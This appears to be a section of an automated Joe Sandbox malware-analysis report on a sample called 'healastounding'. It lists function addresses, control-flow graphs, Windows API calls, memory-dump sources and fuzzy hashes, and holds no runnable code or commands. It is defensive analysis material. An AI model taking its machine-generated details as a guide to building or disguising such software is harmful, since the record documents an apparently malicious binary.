                                                                                                          control_flow_graph 65 148a6d6-148a72d 68 148a72f-148a737 WriteFile 65->68 69 148a771-148a776 65->69 71 148a73d-148a74f 68->71 69->68 72 148a778-148a77d 71->72 73 148a751-148a76e 71->73 72->73
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 623ce954304004a44b0e5ef8dca986a144255ff48b6e84e77bef61bbb94cf300
                                                                                                          • Instruction ID: e6c2d1099b71a5342a4a93244c2c869986b0a7da1693006c64b040af86893bd6
                                                                                                          • Opcode Fuzzy Hash: 623ce954304004a44b0e5ef8dca986a144255ff48b6e84e77bef61bbb94cf300
                                                                                                          • Instruction Fuzzy Hash: 2811B272400204AFEB21EF55DC84B6AFBA8EF04310F14846BED459B261C278E5099FB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A616 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 76 148a616-148a661 79 148a663-148a676 GetFileType 76->79 80 148a696-148a69b 76->80 81 148a678-148a695 79->81 82 148a69d-148a6a2 79->82 80->79 82->81
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 24c0374b468ec457327f86572d437c2f2da9a4901b9b8b835fcf463ec30c0ddf
                                                                                                          • Instruction ID: 24f9ef2b5ca404bebbee4ff2407e394dc94c26d3957ca9b69c7a04b44b7fdfb4
                                                                                                          • Opcode Fuzzy Hash: 24c0374b468ec457327f86572d437c2f2da9a4901b9b8b835fcf463ec30c0ddf
                                                                                                          • Instruction Fuzzy Hash: 92012631500200AFE711DB15DC84F6BFB98DF44220F18C467ED48AF265C2B8A5088EB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A2DC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 86 148a2dc-148a328 88 148a32a-148a33d SetErrorMode 86->88 89 148a353-148a358 86->89 90 148a35a-148a35f 88->90 91 148a33f-148a352 88->91 89->88 90->91
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0148A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: 6ff685ae3f0eed9ef74c501f46c6cd65d0ab397d76da50c7775a3d7e1ccdacf6
                                                                                                          • Instruction ID: 0cdc2b4e7abf6ca16cd655a3b81c066c397f5b19224fcd14bee677335df3c9b5
                                                                                                          • Opcode Fuzzy Hash: 6ff685ae3f0eed9ef74c501f46c6cd65d0ab397d76da50c7775a3d7e1ccdacf6
                                                                                                          • Instruction Fuzzy Hash: 87115E71409384AFD7128B15DC44B62FFB4EF46624F0880DBED858F263D2B5A808DB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A56A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 94 148a56a-148a594 95 148a5d5-148a5da 94->95 96 148a596-148a59e FindCloseChangeNotification 94->96 95->96 97 148a5a4-148a5b6 96->97 99 148a5b8-148a5d4 97->99 100 148a5dc-148a5e1 97->100 100->99
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0148A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: 00fa5a817646d9e1bce18c75e9e852c186960ac0db60ac319d2d48c008460725
                                                                                                          • Instruction ID: 09682a6466f9ee1263611b8455a7f64cad2f2720106e3cca56f7477feb4d3fdd
                                                                                                          • Opcode Fuzzy Hash: 00fa5a817646d9e1bce18c75e9e852c186960ac0db60ac319d2d48c008460725
                                                                                                          • Instruction Fuzzy Hash: 6001BC715002448FDB11DF29E88476AFBA4DF04220F18C0ABDD098F626D6B8E448CFB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A2FE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 102 148a2fe-148a328 103 148a32a-148a33d SetErrorMode 102->103 104 148a353-148a358 102->104 105 148a35a-148a35f 103->105 106 148a33f-148a352 103->106 104->103 105->106
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0148A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: bab6619a16fbd278e0e3f36dd423849fc3be19649ef5a78383e0fb6b203bf7ae
                                                                                                          • Instruction ID: 71b6a82f5f6d2c5efec85294e90120c64f85bf8288527b5a2d89b0fb97e66360
                                                                                                          • Opcode Fuzzy Hash: bab6619a16fbd278e0e3f36dd423849fc3be19649ef5a78383e0fb6b203bf7ae
                                                                                                          • Instruction Fuzzy Hash: 4BF08C35904244CFDB10DF19E88876AFBA0EF04221F18C0ABDD494F726D2F9A408DEA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0580 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 109 17a0580-17a0612 119 17a063d-17a0656 109->119 120 17a0614-17a0631 109->120 123 17a0658 119->123 124 17a0661 119->124 126 17a0638-17a063b 120->126 123->124 126->119 126->120
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $gEq
                                                                                                          • API String ID: 0-3917529146
                                                                                                          • Opcode ID: 0b30a81042f54890bda3b4a1664e0e7729935c82c35e64477013b13c11b3ab3d
                                                                                                          • Instruction ID: 2567eff7f1c8f6e1b5a515ddc0276dbb2ee658d71d0a972c04e633978154bdc3
                                                                                                          • Opcode Fuzzy Hash: 0b30a81042f54890bda3b4a1664e0e7729935c82c35e64477013b13c11b3ab3d
                                                                                                          • Instruction Fuzzy Hash: E8218D70B002168FDB149F79C494BADBAF6AB89304F54456DE502EB291CEB58C058B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0070 Relevance: .2, Instructions: 163COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 127 17a0070-17a007f 173 17a0085 call 31205f6 127->173 174 17a0085 call 17a0070 127->174 175 17a0085 call 17a0140 127->175 176 17a0085 call 31205cf 127->176 177 17a0085 call 17a0014 127->177 128 17a008b-17a00b1 131 17a00de-17a00f0 128->131 132 17a00b3-17a00c9 128->132 134 17a0135-17a0192 131->134 139 17a00f2-17a0123 131->139 133 17a00cb-17a00dc 132->133 132->134 133->131 133->132 144 17a0199-17a01af 134->144 147 17a012d-17a0134 139->147 149 17a0222-17a0235 144->149 150 17a01b1-17a01bd 144->150 151 17a0248-17a024c 149->151 155 17a01cb-17a01cd 150->155 156 17a01bf-17a01c5 150->156 152 17a024e 151->152 153 17a0257 151->153 152->153 159 17a0258 153->159 157 17a01cf-17a01db 155->157 158 17a0237-17a0241 155->158 160 17a01c9 156->160 161 17a01c7 156->161 165 17a01dd-17a01e3 157->165 166 17a01f5-17a0200 157->166 158->149 164 17a0243 158->164 159->159 160->155 161->155 164->150 167 17a01e7-17a01f3 165->167 168 17a01e5 165->168 166->158 171 17a0202-17a0220 166->171 167->166 168->166 171->151 173->128 174->128 175->128 176->128 177->128
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65ef10ea0995c15fa9afbd508a055888fbbff5c5ac40b3e98ad69f53a36996df
                                                                                                          • Instruction ID: 07bb6f523e2a663224f6d1b6b33a3aaa1db93e1b2988eb8187483e62d9a989c6
                                                                                                          • Opcode Fuzzy Hash: 65ef10ea0995c15fa9afbd508a055888fbbff5c5ac40b3e98ad69f53a36996df
                                                                                                          • Instruction Fuzzy Hash: 5D510470B042068FDB259B79C454BBEBBF3ABC8210F55856AE505EB395CF749C02CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A02F0 Relevance: .1, Instructions: 131COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 178 17a02f0-17a03d4 192 17a040f-17a0418 178->192 193 17a041a-17a0420 192->193 194 17a043e-17a0447 192->194 193->194 195 17a0422-17a042b 193->195 196 17a0449 194->196 197 17a0453-17a0462 194->197 198 17a042d-17a043c 195->198 199 17a0481 195->199 196->197 200 17a0464-17a0466 197->200 198->200 203 17a0486 199->203 201 17a046c-17a047f 200->201 202 17a03d6-17a03dc call 17a0580 200->202 201->203 204 17a03e2-17a03ed 202->204 207 17a0487 203->207 205 17a03fa-17a040c 204->205 206 17a03ef-17a03f3 204->206 205->192 206->205 207->207
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1419ed69de28547bc6397e8f11a6d8203eb7e990ea1036c6ae10d6dad78ad6e6
                                                                                                          • Instruction ID: fb862b275dfbc184faa455e8533d1076939ddc8baf48e63f0aa34c4ff717f38a
                                                                                                          • Opcode Fuzzy Hash: 1419ed69de28547bc6397e8f11a6d8203eb7e990ea1036c6ae10d6dad78ad6e6
                                                                                                          • Instruction Fuzzy Hash: D6516834B00609CFDB05DFA8C49099EB7F2FF89700B14C969D905AB356DB74AC42CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0014 Relevance: .1, Instructions: 126COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 210 17a0014-17a0046 211 17a0048 210->211 212 17a0049-17a007f 210->212 211->212 214 17a008b-17a00b1 212->214 259 17a0085 call 31205f6 212->259 260 17a0085 call 17a0070 212->260 261 17a0085 call 17a0140 212->261 262 17a0085 call 31205cf 212->262 263 17a0085 call 17a0014 212->263 217 17a00de-17a00f0 214->217 218 17a00b3-17a00c9 214->218 220 17a0135-17a0192 217->220 225 17a00f2-17a0123 217->225 219 17a00cb-17a00dc 218->219 218->220 219->217 219->218 230 17a0199-17a01af 220->230 233 17a012d-17a0134 225->233 235 17a0222-17a0235 230->235 236 17a01b1-17a01bd 230->236 237 17a0248-17a024c 235->237 241 17a01cb-17a01cd 236->241 242 17a01bf-17a01c5 236->242 238 17a024e 237->238 239 17a0257 237->239 238->239 245 17a0258 239->245 243 17a01cf-17a01db 241->243 244 17a0237-17a0241 241->244 246 17a01c9 242->246 247 17a01c7 242->247 251 17a01dd-17a01e3 243->251 252 17a01f5-17a0200 243->252 244->235 250 17a0243 244->250 245->245 246->241 247->241 250->236 253 17a01e7-17a01f3 251->253 254 17a01e5 251->254 252->244 257 17a0202-17a0220 252->257 253->252 254->252 257->237 259->214 260->214 261->214 262->214 263->214
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bc0c4f507be5ab527a01e60baf8505e530eedd2167eb5e3c56643167b0b7a5b6
                                                                                                          • Instruction ID: e04b3affcdb9b96f268356f5ebb7ff94d83d7482ac3f8e18efb00ec776c1fbcc
                                                                                                          • Opcode Fuzzy Hash: bc0c4f507be5ab527a01e60baf8505e530eedd2167eb5e3c56643167b0b7a5b6
                                                                                                          • Instruction Fuzzy Hash: A431E9316093828FC316CB34985069AFFF2BF96210F1982DBD448DB1A7C6399C05C7A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A08D8 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 264 17a08d8-17a0902 266 17a0976-17a0987 264->266 267 17a0904-17a0913 264->267 270 17a0989-17a0993 266->270 271 17a0995 266->271 272 17a094a 267->272 273 17a0915-17a0924 267->273 274 17a099a-17a099c 270->274 271->274 278 17a0954-17a0956 272->278 279 17a0958-17a0964 273->279 280 17a0926-17a0935 273->280 276 17a099e-17a09b0 274->276 277 17a09c4-17a09dd 274->277 276->277 289 17a09b2-17a09bd 276->289 278->266 279->266 285 17a0966-17a096d 280->285 286 17a0937-17a0946 280->286 285->266 293 17a0948 286->293 294 17a096f-17a0974 286->294 289->277 293->266 294->266
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 425932f396e6d7b474e085dbcfa0e8d720cf4c3350a3ef39edb550fe815440b0
                                                                                                          • Instruction ID: 274b2e324ba0c3a4de242fad4ec470ba0488ded8970bec002d69de38a8f2349f
                                                                                                          • Opcode Fuzzy Hash: 425932f396e6d7b474e085dbcfa0e8d720cf4c3350a3ef39edb550fe815440b0
                                                                                                          • Instruction Fuzzy Hash: CE218335B002528BFF299639951027F6296ABD4394B948ABCDA4ADB344FE38CC03C791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0769 Relevance: .1, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2c09fd69abef91274a2b6d8acf8abdef7d31f5e168305419502fb00ff37ba3b9
                                                                                                          • Instruction ID: be0362f77af001dc4818d186278257dea083fc1aefd97053a91417fa5a5ceaeb
                                                                                                          • Opcode Fuzzy Hash: 2c09fd69abef91274a2b6d8acf8abdef7d31f5e168305419502fb00ff37ba3b9
                                                                                                          • Instruction Fuzzy Hash: B2217770A402098FDB259B68D4687BEBEF2ABC8310F944629E906E7354DF749C02CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0140 Relevance: .1, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ad37a1fe46240d13c6aa7d8172cf1b140d379133d1231d2004bf9ff33e48892b
                                                                                                          • Instruction ID: b189853424457822179b9d762d3d5e82aab2ad94610af9a35283c2d168d52194
                                                                                                          • Opcode Fuzzy Hash: ad37a1fe46240d13c6aa7d8172cf1b140d379133d1231d2004bf9ff33e48892b
                                                                                                          • Instruction Fuzzy Hash: 5621A130F042498FDB259F78D0546BEBEE2ABC8210F59866EE601E7394DF759802CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A0489 Relevance: .1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cdc3e53036370f6634081c2c49224cdeb077986a7106fe8445e46a63d8185a4e
                                                                                                          • Instruction ID: 9c39ad05c19c2d5aa8629a23982fd3aedbd0e3aff0550cf3cf857060e02220f1
                                                                                                          • Opcode Fuzzy Hash: cdc3e53036370f6634081c2c49224cdeb077986a7106fe8445e46a63d8185a4e
                                                                                                          • Instruction Fuzzy Hash: 3F31BF75A00609DFDB09CFA9D48099DFBB2BF89304FA58969E905AB211DB71EC42CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A06B8 Relevance: .1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9469ff5b02cde1d2a9125f8d05d3fcbeec0cf62019679eff6ebcf928f0bd47d4
                                                                                                          • Instruction ID: 896aa68aacdaff957a7abdef538a3891adcb8c32f29ad3066e2183a898ad2a3c
                                                                                                          • Opcode Fuzzy Hash: 9469ff5b02cde1d2a9125f8d05d3fcbeec0cf62019679eff6ebcf928f0bd47d4
                                                                                                          • Instruction Fuzzy Hash: BC118E34B002168BDF55DB7994101AEBAE7BBC81507604579DA09E7344EF389E03CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 031205CF Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.537809241.0000000003120000.00000040.00000020.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_3120000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d01abe90a8712d7e42a42c1fd85f082dc3de6a32c52a3a13db880cbf558d1f9f
                                                                                                          • Instruction ID: 48d502b375c7e6abad6cecfb5f69cc33139687696e7947bb1cf1e9446aa8894d
                                                                                                          • Opcode Fuzzy Hash: d01abe90a8712d7e42a42c1fd85f082dc3de6a32c52a3a13db880cbf558d1f9f
                                                                                                          • Instruction Fuzzy Hash: 53018B765093845FD712DF06DC41862FFA8EA86670749C49BEC499B612D225B508CF71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 017A06A7 Relevance: .0, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.532996394.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_17a0000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f579e50c30d458a216d38575ce6ed0da19c778dfce65941d203c792d7cf66e9
                                                                                                          • Instruction ID: 7b550b576bfabff6a5caa6707229537731976072dee515814c9c5c020e4a9659
                                                                                                          • Opcode Fuzzy Hash: 2f579e50c30d458a216d38575ce6ed0da19c778dfce65941d203c792d7cf66e9
                                                                                                          • Instruction Fuzzy Hash: 77013C71E002198FCB94DFBC98406EEBBF6FB9D250B60417AD508E3310FA309A028B90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 031205F6 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.537809241.0000000003120000.00000040.00000020.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_3120000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 31fc97ca5ef93561bdb4fd0f2c16dfadaba0d7439f88982a2279897f247698e6
                                                                                                          • Instruction ID: b021fd65f1bac8a2e367f0b7b6e64f3cb6745fa7c4b579570dabff50a532d8e5
                                                                                                          • Opcode Fuzzy Hash: 31fc97ca5ef93561bdb4fd0f2c16dfadaba0d7439f88982a2279897f247698e6
                                                                                                          • Instruction Fuzzy Hash: F0E06D766006048B9650CF0AEC81452F798EB84630B18C07BDC0D8BB10D139B5048EA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 014823BC Relevance: .0, Instructions: 14COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511029727.0000000001482000.00000040.00000800.00020000.00000000.sdmp, Offset: 01482000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1482000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0954e026149606bb337049d65207181006ad60ef8070e2f99ee99c3ced0fdcb2
                                                                                                          • Instruction ID: c36a2785ccd34280e31cfd4de0801633b8a221973f7e8080ac373b9546215448
                                                                                                          • Opcode Fuzzy Hash: 0954e026149606bb337049d65207181006ad60ef8070e2f99ee99c3ced0fdcb2
                                                                                                          • Instruction Fuzzy Hash: B0D05E342002814BD716EB2CC1A4F5E3BD4AB41B04F0644E9BC008B772C3B8D981CA00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 0090576E Relevance: .6, Instructions: 585COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Offset: 00900000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.463634270.0000000000900000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.488034995.0000000000C92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_900000_healastounding.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 43066a83a97714b4a9cffd188f940667f785cc15af99e4bbea9783c30c6087d8
                                                                                                          • Instruction ID: ffa4655a621791e35a25ed452f88ba651285232f2c220fa28f94bb4779c3b582
                                                                                                          • Opcode Fuzzy Hash: 43066a83a97714b4a9cffd188f940667f785cc15af99e4bbea9783c30c6087d8
                                                                                                          • Instruction Fuzzy Hash: A032556144F7C18FD7235B788CB86A27FB4AE5321474E49CBC4C1CF4A3EA295919CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 009466CB Relevance: .2, Instructions: 194COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Offset: 00900000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.463634270.0000000000900000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.488034995.0000000000C92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_900000_healastounding.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9a5fe5b6b0bbe3c033a493bae5c13515ebe5a9208075797c594e28f8f00edf9d
                                                                                                          • Instruction ID: d5fb75f37bebecf7080669e3c792a16ea7ff6bd169f3b8fdcec36ea678c6a353
                                                                                                          • Opcode Fuzzy Hash: 9a5fe5b6b0bbe3c033a493bae5c13515ebe5a9208075797c594e28f8f00edf9d
                                                                                                          • Instruction Fuzzy Hash: 8751D4765ED3E24EC3438F38C4D5AC7BF719E4BA2132E56E8C4804F143D22A5919E7A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.6%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:7%
                                                                                                          Total number of Nodes:86
                                                                                                          Total number of Limit Nodes:5
